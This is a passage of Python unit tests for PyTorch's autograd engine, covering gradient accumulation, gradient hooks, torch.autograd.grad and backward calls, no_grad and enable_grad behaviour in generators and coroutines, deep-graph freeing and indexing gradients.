params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
@skipIfNoLapack
def test_slogdet_sign(self):
a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
s, logdet = a.slogdet()
# test that sign should not require grad
self.assertFalse(s.requires_grad)
# test that backward through computation involving sign works
def sign_mul_logdet(mat):
s, logdet = mat.slogdet()
return s * logdet
u, s, v = a.detach().svd()
s.abs_().clamp_(0.0001)
for sign in (-1, 1):
s[-1] = sign
mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
gradcheck(sign_mul_logdet, mat)
gradgradcheck(sign_mul_logdet, mat)
def test_sum_to_with_empty_dim_grad(self):
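# Broadcasting shapes (4, 0) and (4, 1) yields (4, 0); b's gradient must be
# reduced back to (4, 1) and is all zeros since there are no elements to sum.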
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
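# For z = x**2 + x*y + y**2 (elementwise): dz/dx = 2x + y and dz/dy = x + 2y.
# grad_sum = 2*x.grad + y.grad = 5x + 4y, so backpropagating ones through it
# adds a constant 5 to x.grad and 4 to y.grad (the expected x_hv and y_hv).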
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
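# Same second-derivative setup as test_hessian_vector, but here the
# Hessian-vector product is computed with torch.autograd.grad, which must
# leave x.grad and y.grad untouched.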
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that a shape mismatch between grad_outputs and outputs raises an error
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.fail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
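# Repeatedly take gradient-ascent steps on a non-leaf x via torch.autograd.grad
# (create_graph=True); .grad must stay unset for both x and y until the final
# backward(), which populates the leaves x_init and y.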
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture the grad of a nonleaf tensor,
# but avoid a segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
# Create a hook that does not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different from the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# With allow_unused=False, a None among the computed grads should raise
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for an autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
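# retain_grad() must not create a reference cycle that keeps y alive: once
# run_test returns, the weak reference should already be expired, while the
# returned z can still be backpropagated through.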
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backward()
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
# backward doesn't have an allow_unused flag, so when a variable is not
# part of the graph it behaves as if allow_unused were True:
# z.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
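# With y = x**2 and z = y**3 = x**6, dy/dx = 2*x and dz/dx = 6*x**5, so the
# accumulated gradient is 2*x*go_y + 6*x**5*go_z.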
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
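# The second output of a multi-output Function should report output_nr == 1,
# and that index must be preserved when the tensor is saved for backward.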
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` would trigger it, but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing, with fewer dims, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing, with fewer dims, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
